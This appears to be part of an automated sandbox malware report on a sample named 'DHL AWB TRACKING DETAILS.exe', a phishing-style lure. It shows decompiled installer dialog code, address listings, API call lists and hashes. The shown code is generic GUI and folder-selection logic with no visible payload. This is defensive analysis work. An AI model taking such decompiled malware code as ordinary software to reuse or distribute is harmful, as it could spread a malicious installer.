									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423eb8; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x420474;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42048c;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x420474 = _t315;
									 *0x42048c = _t315;
									 *0x423f00 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423eb9 & 0x00000001;
										if(( *0x423eb9 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423ecc - _t315; // 0x2
										_v32 =  *0x42048c;
										_t196 =  *0x423ec8; // 0x50fadc
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42367c; // 0x5169b1
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E00404610(0x3ff, 0xfffffffb, E004046C5(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x50fae4
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x50faf4
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423ecc; // 0x2
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42048c);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423f00 = _a4;
					_t247 =  *0x423ecc; // 0x2
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42048c = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420480 =  *0x420480 | 0xffffffff;
					_v24 = _t250;
					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420474 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E37(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E37(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423ecc - _t318; // 0x2
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42048c + _t318 * 4) = _t274;
									_t288 =  *( *0x42048c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423ecc; // 0x2
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E6C(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E6C(_v12);
								L89:
								return E00403E9E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                    0x00404790
                    0x00404796
                    0x00404798
                    0x0040479e
                    0x004047a4
                    0x004047a7
                    0x004047b1
                    0x004047ba
                    0x004047bd
                    0x004047c0
                    0x004049e8
                    0x004049e8
                    0x004049ef
                    0x00404a03
                    0x004049f1
                    0x004049f3
                    0x004049f6
                    0x004049f7
                    0x004049fe
                    0x004049fe
                    0x00404a06
                    0x00404a0f
                    0x00404a1a
                    0x00404a1a
                    0x00404a1d
                    0x00404a20
                    0x00404a2f
                    0x00404a2f
                    0x00404a36
                    0x00404aae
                    0x00404aae
                    0x00404ab1
                    0x00404ab3
                    0x00404ab6
                    0x00404abd
                    0x00404acb
                    0x00404acb
                    0x00404acd
                    0x00404ad0
                    0x00404ad7
                    0x00404ad9
                    0x00404add
                    0x00404afa
                    0x00404afe
                    0x00404afe
                    0x00404adf
                    0x00404aec
                    0x00404aec
                    0x00404add
                    0x00404ad7
                    0x00000000
                    0x00404ab1
                    0x00404a38
                    0x00404a3b
                    0x00404a46
                    0x00404a48
                    0x00404a4b
                    0x00404a52
                    0x00404a57
                    0x00404a59
                    0x00404a63
                    0x00404a63
                    0x00404a67
                    0x00404a69
                    0x00404a6c
                    0x00404a6e
                    0x00404a71
                    0x00404a87
                    0x00404a87
                    0x00404a73
                    0x00404a73
                    0x00404a79
                    0x00404a7b
                    0x00404a82
                    0x00404a7d
                    0x00404a7d
                    0x00404a7d
                    0x00404a7b
                    0x00404a8b
                    0x00404a8d
                    0x00404a92
                    0x00404a9b
                    0x00404a9c
                    0x00404aa6
                    0x00404aa6
                    0x00404aa8
                    0x00404aab
                    0x00404aab
                    0x00404a6c
                    0x00000000
                    0x00404a59
                    0x00404a3d
                    0x00404a40
                    0x00404a44
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404a44
                    0x00404a22
                    0x00404a29
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404a11
                    0x00404a11
                    0x00404a14
                    0x00404b01
                    0x00404b01
                    0x00404b08
                    0x00404b7c
                    0x00404b7c
                    0x00404b83
                    0x00404b8f
                    0x00404b8f
                    0x00404b91
                    0x00404b98
                    0x00404b9a
                    0x00404b9f
                    0x00404ba1
                    0x00404ba4
                    0x00404ba4
                    0x00404baa
                    0x00404baf
                    0x00404bb1
                    0x00404bb4
                    0x00404bb4
                    0x00404bba
                    0x00404bc0
                    0x00404bc6
                    0x00404bc6
                    0x00404bcc
                    0x00404bd3
                    0x00404d20
                    0x00404d20
                    0x00404d27
                    0x00404d29
                    0x00404d30
                    0x00404d34
                    0x00404d41
                    0x00404d41
                    0x00404d44
                    0x00404d4a
                    0x00404d5c
                    0x00404d5c
                    0x00404d30
                    0x00000000
                    0x00404bd9
                    0x00404bdb
                    0x00404be0
                    0x00404be3
                    0x00404be7
                    0x00404be7
                    0x00404bec
                    0x00404bef
                    0x00404c30
                    0x00404c32
                    0x00404c3c
                    0x00404c42
                    0x00404c45
                    0x00404c4a
                    0x00404c51
                    0x00404c54
                    0x00404cf6
                    0x00404cfc
                    0x00404d02
                    0x00404d07
                    0x00404d0a
                    0x00404d1b
                    0x00404d1b
                    0x00000000
                    0x00404c5a
                    0x00404c5a
                    0x00404c5a
                    0x00404c5d
                    0x00404c63
                    0x00404c66
                    0x00404c68
                    0x00404c6a
                    0x00404c6c
                    0x00404c6f
                    0x00404c72
                    0x00404c79
                    0x00404c7b
                    0x00404c7e
                    0x00404c85
                    0x00404c88
                    0x00404c88
                    0x00404c88
                    0x00404c88
                    0x00404c8c
                    0x00404c8f
                    0x00404c9b
                    0x00404c9c
                    0x00404c9f
                    0x00404ca1
                    0x00404ca1
                    0x00404ca1
                    0x00404c91
                    0x00404c93
                    0x00404c93
                    0x00404cc0
                    0x00404cc0
                    0x00404cc1
                    0x00404ccd
                    0x00404cdc
                    0x00404cdc
                    0x00404cde
                    0x00404ce1
                    0x00404cea
                    0x00404cea
                    0x00000000
                    0x00404c5d
                    0x00404bf1
                    0x00404bfc
                    0x00404bff
                    0x00404c04
                    0x00404c06
                    0x00404c08
                    0x00404c0a
                    0x00404c1a
                    0x00404c24
                    0x00404c26
                    0x00404c29
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404c0c
                    0x00404c0c
                    0x00404c0c
                    0x00404c0f
                    0x00404c12
                    0x00404c14
                    0x00404c14
                    0x00404c14
                    0x00404c15
                    0x00404c16
                    0x00404c16
                    0x00000000
                    0x00404c0c
                    0x00404bef
                    0x00404bd3
                    0x00404b0a
                    0x00404b10
                    0x00000000
                    0x00000000
                    0x00404b1c
                    0x00404b20
                    0x00000000
                    0x00000000
                    0x00404b30
                    0x00404b32
                    0x00404b35
                    0x00000000
                    0x00000000
                    0x00404b47
                    0x00404b49
                    0x00404b4c
                    0x00404b56
                    0x00404b58
                    0x00404b59
                    0x00404b5a
                    0x00404b69
                    0x00404b6b
                    0x00404b72
                    0x00404b75
                    0x00000000
                    0x00404b75
                    0x00404b4e
                    0x00404b51
                    0x00404b54
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404b54
                    0x00000000
                    0x00404a14
                    0x004047c6
                    0x004047cb
                    0x004047d0
                    0x004047d5
                    0x004047d6
                    0x004047df
                    0x004047ea
                    0x004047f5
                    0x004047fb
                    0x00404809
                    0x0040481e
                    0x00404823
                    0x0040482e
                    0x00404837
                    0x0040484c
                    0x0040485d
                    0x0040486a
                    0x0040486a
                    0x0040486f
                    0x00404875
                    0x00404877
                    0x0040487a
                    0x0040487f
                    0x00404884
                    0x00404886
                    0x00404886
                    0x004048a6
                    0x004048a6
                    0x004048a8
                    0x004048a9
                    0x004048ae
                    0x004048b1
                    0x004048b4
                    0x004048b8
                    0x004048bd
                    0x004048c2
                    0x004048c6
                    0x004048cb
                    0x004048d0
                    0x004048d2
                    0x004048d4
                    0x004048da
                    0x004049a4
                    0x004049b7
                    0x00000000
                    0x004048e0
                    0x004048e3
                    0x004048e6
                    0x004048e9
                    0x004048e9
                    0x004048ef
                    0x004048f5
                    0x004048f8
                    0x004048fe
                    0x004048ff
                    0x00404904
                    0x0040490d
                    0x00404914
                    0x00404917
                    0x0040491a
                    0x0040491d
                    0x00404957
                    0x00404959
                    0x00404982
                    0x0040495b
                    0x00404968
                    0x00404968
                    0x0040491f
                    0x00404922
                    0x00404931
                    0x0040493b
                    0x00404943
                    0x0040494a
                    0x00404952
                    0x00404952
                    0x0040491d
                    0x00404988
                    0x00404989
                    0x0040498f
                    0x00404995
                    0x00404995
                    0x004049a2
                    0x004049bd
                    0x004049c1
                    0x004049de
                    0x004049e3
                    0x004049e6
                    0x004049e6
                    0x00000000
                    0x004049c3
                    0x004049c8
                    0x004049d1
                    0x00404d5e
                    0x00404d70
                    0x00404d70
                    0x004049c1
                    0x00000000
                    0x004049a2
                    0x004048da

                    APIs
                    • GetDlgItem.USER32 ref: 00404789
                    • GetDlgItem.USER32 ref: 00404796
                    • GlobalAlloc.KERNEL32(00000040,00000002), ref: 004047E2
                    • LoadBitmapA.USER32 ref: 004047F5
                    • SetWindowLongA.USER32 ref: 0040480F
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404823
                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404837
                    • SendMessageA.USER32(?,00001109,00000002), ref: 0040484C
                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404858
                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040486A
                    • DeleteObject.GDI32(?), ref: 0040486F
                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040489A
                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004048A6
                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040493B
                    • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404966
                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 0040497A
                    • GetWindowLongA.USER32 ref: 004049A9
                    • SetWindowLongA.USER32 ref: 004049B7
                    • ShowWindow.USER32(?,00000005), ref: 004049C8
                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404ACB
                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B30
                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404B45
                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404B69
                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404B8F
                    • ImageList_Destroy.COMCTL32(?), ref: 00404BA4
                    • GlobalFree.KERNEL32 ref: 00404BB4
                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C24
                    • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404CCD
                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404CDC
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404CFC
                    • ShowWindow.USER32(?,00000000), ref: 00404D4A
                    • GetDlgItem.USER32 ref: 00404D55
                    • ShowWindow.USER32(00000000), ref: 00404D5C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                    • String ID: $M$N
                    • API String ID: 1638840714-813528018
                    • Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                    • Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
                    • Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
                    • Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404275 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 266stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				signed int* _t145;
				intOrPtr _t147;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x41fc68; // 0x0
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E0040532A(0x3fb, _t162);
					E00405CE3(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040532A(0x3fb, _t162);
							if(E00405659(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E00405A85(0x41f460, _t162);
							_t145 = 0;
							_t86 = E00405DA3(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E00405A85(0x41f460, _t162);
								_t88 = E0040560C(0x41f460);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x41f460) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E004055BF(0x41f460) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x41f460) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E004046C5(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								_t147 =  *0x42367c; // 0x5169b1
								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
									E00404610(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f450);
									} else {
										E00404610(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403E59(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x420484 == _t145) {
									E0040420A();
								}
								 *0x420484 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x420498;
							_v56 = E004045AA;
							_v52 = _t162;
							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405578(_t162);
								_t124 =  *0x423eb0; // 0x50f930
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\engineer\\AppData\\Local\\Temp") {
									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x420484 =  &(( *0x420484)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
						E00405578(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E37(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E37(_t159);
					E00403E6C(_v12);
					_t138 = E00405DA3(7);
					if(_t138 == 0) {
						L53:
						return E00403E9E(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}








































                    0x0040427b
                    0x00404282
                    0x0040428e
                    0x0040429c
                    0x004042a4
                    0x004042a8
                    0x004042ae
                    0x004042ae
                    0x004042ba
                    0x0040432e
                    0x00404335
                    0x0040440a
                    0x00404411
                    0x00404420
                    0x00404420
                    0x00404424
                    0x0040442a
                    0x00404437
                    0x00404439
                    0x00404439
                    0x00404447
                    0x0040444c
                    0x0040444f
                    0x00404456
                    0x00404459
                    0x00404490
                    0x00404492
                    0x00404498
                    0x0040449f
                    0x004044a1
                    0x004044a1
                    0x004044bd
                    0x004044f9
                    0x00000000
                    0x004044bf
                    0x004044c2
                    0x004044d6
                    0x004044d8
                    0x00000000
                    0x004044d8
                    0x0040445b
                    0x0040445f
                    0x0040448e
                    0x0040448e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404461
                    0x00404461
                    0x0040446e
                    0x00404473
                    0x00000000
                    0x00000000
                    0x00404477
                    0x00404479
                    0x00404479
                    0x00404484
                    0x00404487
                    0x0040448c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040448c
                    0x004044e7
                    0x004044ee
                    0x004044f5
                    0x004044fc
                    0x004044fc
                    0x00404501
                    0x00404503
                    0x0040450b
                    0x00404511
                    0x00404511
                    0x00404518
                    0x00404521
                    0x0040452b
                    0x00404533
                    0x00404549
                    0x00404535
                    0x00404539
                    0x00404539
                    0x00404533
                    0x0040454e
                    0x00404553
                    0x00404558
                    0x00404561
                    0x00404561
                    0x0040456a
                    0x0040456c
                    0x0040456c
                    0x00404578
                    0x00404580
                    0x0040458a
                    0x0040458a
                    0x0040458f
                    0x00000000
                    0x0040458f
                    0x00404459
                    0x00404413
                    0x0040441a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040441a
                    0x0040433b
                    0x00404341
                    0x0040435b
                    0x00404360
                    0x0040436a
                    0x00404371
                    0x00404380
                    0x00404383
                    0x00404386
                    0x0040438d
                    0x00404395
                    0x00404398
                    0x0040439c
                    0x004043a3
                    0x004043ab
                    0x00404403
                    0x004043ad
                    0x004043ae
                    0x004043b5
                    0x004043ba
                    0x004043bf
                    0x004043c7
                    0x004043d4
                    0x004043e8
                    0x004043ec
                    0x004043ec
                    0x004043e8
                    0x004043f1
                    0x004043fc
                    0x004043fc
                    0x004043ab
                    0x00000000
                    0x00404360
                    0x0040434e
                    0x00000000
                    0x00000000
                    0x00404354
                    0x00000000
                    0x004042bc
                    0x004042bc
                    0x004042c8
                    0x004042d2
                    0x004042df
                    0x004042df
                    0x004042e5
                    0x004042ee
                    0x004042f7
                    0x004042fa
                    0x004042fd
                    0x00404305
                    0x00404308
                    0x0040430b
                    0x00404313
                    0x0040431a
                    0x00404321
                    0x00404595
                    0x004045a7
                    0x004045a7
                    0x0040432c
                    0x00000000
                    0x0040432c

                    APIs
                    • GetDlgItem.USER32 ref: 004042C1
                    • SetWindowTextA.USER32(?,?), ref: 004042EE
                    • SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
                    • CoTaskMemFree.OLE32(00000000), ref: 004043AE
                    • lstrcmpiA.KERNEL32(gdsanv,00420498,00000000,?,?), ref: 004043E0
                    • lstrcatA.KERNEL32(?,gdsanv), ref: 004043EC
                    • SetDlgItemTextA.USER32 ref: 004043FC
                      • Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D
                      • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                      • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                      • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                      • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
